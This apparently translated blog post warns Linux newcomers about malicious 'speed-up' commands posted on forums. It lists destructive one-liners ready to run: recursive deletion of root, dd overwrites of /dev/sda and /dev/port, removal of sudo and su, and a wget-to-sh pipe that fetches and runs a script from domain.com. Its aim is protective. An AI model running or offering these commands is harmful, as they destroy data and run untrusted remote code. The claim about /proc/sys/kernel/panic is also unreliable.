Linux users - the people cheerful. We love to joke. Unfortunately, some of the jokes on the Linux newbies sometimes end with the destruction of the system and the victim no longer a laughing matter. How not to fall for the malicious prank?
Sorry for the spelling and phonetic errors in the text.
Owner and main writer of MintGuide.org is not a native English speaker.
A novice user reading on the forum someone's advice from the series "How to speed up Linux 100 times". In the body of the review are not clear lines that need to enter in the terminal. The user copy-paste the recipe and his computer blown up by a mine. But what to do if you speed up Linux 100 times wants to lose data - no? Need to know the code for the following killer commands:
1. Command transfers the contents of the hard disk into a black hole. The equivalent of rm-rf /
mv / /dev/null
2. Deleting everything on the disk. In fact, the team immediately will not work - first ask the user a question. But what makes a user Linux Mint? Presses "y". If you use the option "--no-preserve-root", the output of the question will be suppressed.
rm -rf /
3. From domain.com loads and immediately runs the code that you won't even see. Very dangerous command. It leads even some experienced Linux users seeing the domain that is trustworthy. But do not forget that in some cases users can upload their files. Safe the txt extension also should not be deceived, it is nothing to do with. The contents of a text file is fed to the input sh.
wget http://www.domain.com/script.txt -O- | sh
4. Will destroy data on the disk, and is guaranteed without the possibility of recovery (assuming that will work to the end).
dd if=/dev/random of=/dev/sda
5. Fork bomb. Threat only on the server. The command creates copies of himself until, until you run out of RAM. The computer then hangs, but after the reboot fully functional.
6. Will not allow to get root privileges from the terminal. The most innocuous joke, but for beginners alarmist. Experienced linux users press Ctrl-Alt-F1 will drop safely as root and will restore sudo and su.
rm -f /usr/bin/sudo ; rm -f /bin/su
7. The entry of debris into the ports input-output. Will cause a kernel panic and freezes. Some users claim that in this way it is possible to cause hardware damage, but documentary evidence of this no.
dd if=/dev/random of=/dev/port
8. The correct call of a kernel panic Linux.
echo 1 > /proc/sys/kernel/panic
9. Any combination of this command critically. "echo "Hello!" > /dev/sda" will spoil the layout of the disk. Large pieces of debris that are sent to /dev/sda will destroy data on the disk without the possibility of recovery specialized programs.